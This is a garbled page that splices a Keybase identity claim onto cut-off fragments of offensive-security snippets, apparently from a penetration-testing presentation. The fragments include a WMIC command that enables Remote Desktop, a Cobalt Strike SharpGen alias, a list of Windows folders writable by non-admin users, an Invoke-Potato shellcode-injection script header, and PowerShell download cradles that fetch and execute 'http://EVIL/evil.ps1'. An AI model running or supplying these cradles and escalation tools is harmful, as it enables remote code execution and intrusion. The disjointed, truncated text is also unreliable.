I hereby claim:
- I am boh on github.
- I am boh (https://keybase.io/boh) on keybase.
- I have a public key whose fingerprint is 5BC5 B107 1701 D83F 8360 2C05 A4BC F831 4057 A9F4
To claim this, I am signing this object:
```
C:\> wmic /namespace:\\root\CIMV2\TerminalServices PATH Win32_TerminalServiceSetting WHERE (__CLASS !="") CALL SetAllowTSConnections 1
# https://twitter.com/wincmdfu/status/945613485408387072
```
```
$dotnetpath = "/usr/local/share/dotnet/dotnet";
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
$temppath = "/tmp/";

beacon_command_register("sharpgen", "Compile and execute C-Sharp", "Synopsis: sharpgen [code]\n");

alias sharpgen {
    $executionId = "sharpgen_" . int(rand() * 100000);
    $temporaryCsharp = $temppath . $executionId . ".cs";
    $executableFilename = $temppath . $executionId . ".exe";
```
```
## locations writable by non-admin users in Windows (Windows 10)
# default folders
C:\$Recycle.Bin\<USER SID> (whoami /user)
C:\Users\All Users (links to C:\ProgramData)
C:\PerfLogs
C:\ProgramData
C:\Windows\Tasks
C:\Windows\tracing
```
```powershell
function Invoke-Potato
{
<#
.SYNOPSIS
Script leverages Reflective Potato and Invoke-ReflectivePEInjection to reflectively load Rotten Potato DLL directly into memory. This
allows you to indirectly perform the Rotten Potato attack without having to touch the disk, or utilize any external loaders.
The script takes a Shellcode parameter which will execute any arbitrary shellcode within the HostProc argument. Default is set to C:\Windows\System32\notepad.exe
```
```powershell
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
```
```powershell
#DISCLAIMER
#I'm not the original author of the script...
#Original git repo vanished
function String-to-ByteArray ($String)
{
    $ByteArray=@()
    For ( $i = 0; $i -lt ($String.Length/2); $i++ )
    {
        $Chars=$String.Substring($i*2,2)
```
This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation
| IDA Plugins | Preferred | Neutral | Unreviewed |
|---|---|---|---|